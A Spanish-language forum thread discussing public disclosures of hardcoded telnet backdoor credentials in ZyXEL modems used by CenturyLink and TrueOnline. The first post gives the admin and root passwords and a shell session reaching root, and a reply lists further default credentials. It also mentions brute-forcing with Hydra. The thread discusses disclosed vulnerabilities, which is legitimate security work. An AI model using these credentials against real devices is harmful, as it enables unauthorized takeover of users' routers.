Backdoor telnet en Zyxel con credenciales "hardcoded" genéricos.

kcdtv · 02-11-2017 23:42:20

Backdoor telnet en Zyxel con credenciales "hardcoded" genéricos.

He mirrado en el diccionario pero no he visto una traducción satisfactoria para "hard coded".
"Codificado"... Cierto. Pero con esta noción de que el usuario final normal y corriente no puede hacer nada al respecto.
Ni deshabilitar la puerta trasera, ni modificar los credenciales.
Lo que no está dicho explícitamente en el full dislcosure es si es posible o no deshabilitar el servicio telnet para colmatar la brecha.
De paso; el full disclosure es este:

ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password. @ PacktStorm by Matthew Sheimo

Hace mucho tiempo que telefónica no ha contratado a Zyxell para equipar los hogares de sus clientes.
En el caso presente se ha encontrado en el PK5001Z

Del ISP norte americano Century Link

¡Qué bonito el marketing!
Internet al natural en un campo de trigo con OGM, big_smile
El router es un poco basto pero dicen que tienes antenas internas de 5dBi lo que no está mal (si es cierto)

The PK5001Z features 802.11n technology with 5 dBi antennas (2T x 2R) which provides the
ultimate solution: improved speed, reduced dead zones, and extended coverage. With data
rates of up to 300 Mbps, the PK5001Z provides stable and reliable wireless connections for
high-speed data and multimedia delivery

Obteniendo acceso root mediante telnet

Se hace en dos tiempos:

Conexión como administrador,
```
username: admin
password: CenturyL1nk
```
Podéis ver a continuación el resultado de un "whoami" (conocer su nombre de usuario) una vez conectado con admin:CenturyL1nk
```
$ whoami
admin_404A03Tel
```
Escalar privilegios con su.
Para "ser root" y tener "un poder absoluto" sobre el Punto de Acceso se hace con el conocido comando su que permite obtener los privilegios root desde una consola.
Y la contraseña "root" genérica es.... zyad5001
```
$ su
Password: zyad5001
# whoami
root
# uname -a
Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown
# cat /etc/zyfwinfo
Vendor Name:                      ZyXEL Communications Corp.
```

Conclusión

Hay que aplaudir el ISP Century Link por dejarse una cuenta y por su contraseña original y compleja: CenturyL1nk
El i por el 1... Estos tíos son de los buenos. big_smile .
Ahora lo más interesante es ver la contraseña root de Zyxell que tampoco está rebuscada.
Buscando por la red se ven otros avisos de seguridad acerca de zyxell con historias de cuentas con credenciales comunes (admin, 1234,) o que son sujetos a ataques por diccionario (porque se basan en el nombre de la empresa, el modelo)
Algo que se rompe con Hydra y un diccionario a medidas bien pensado.
¡Ojo con los Zyxell!

crash · 03-11-2017 00:07:07

jajaajajaja que buenos son los admins de zyxell jajajaja

kcdtv · 03-11-2017 00:22:47

otro ejemplo de cagada by zyxel

#5
Vulnerability: Default administrative credentials (ZyXEL P660HN-T v1)
NO-CVE
Attack Vector: Remote
Constraints: N/A
Affected versions:
- ZyXEL P660HN-T, hardware revision v1, TrueOnline firmware version
TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31, other firmware versions
might be affected
This router contains the following default administrative accounts:
username: admin; password: password
username: true; password: true

Me gusta mucho true:true
¿De verdad? big_smile
Buneo, la backdoor true:true es la que se ha dejado el ISP y supongo que la admin:password es la de zyxel con "superpoderes"
ver TrueOnline ZyXEL / Billion Command Injection / Default Credentials

crash · 03-11-2017 01:18:00

jajajajajajaja lo que te decía, que son buenos, de lo mejor, de lo mejorcito....

Tema	Respuestas	Vistas	Ultimo mensaje
Pegado: Pegado:: Base de datos WPSPIN (original) open source actualizada por kcdtv [ 1 2 3 4 5 ]	109	101568	Hoy 16:08:11 por uga_uga
Vulnerabilidad WPA con Sagecom [email protected] 5260 por jorose1987	2	186	Ayer 20:46:39 por yojanon
Configurar antena Ubiquiti loco M5 a proveedor megacable. por Pakalkin	0	45	Ayer 19:59:55 por Pakalkin
Pegado: Pegado:: Wireless Air Cut, auditoria del protocolo wps en Windows por Patcher [ 1 2 3 … 17 ]	412	129214	18-03-2019 11:01:04 por Patcher
A los que habeis probado la AWUS1900 por powermi	1	87	17-03-2019 12:15:44 por kcdtv

Foro Wifi-libre.com

Anuncio

#1 02-11-2017 23:42:20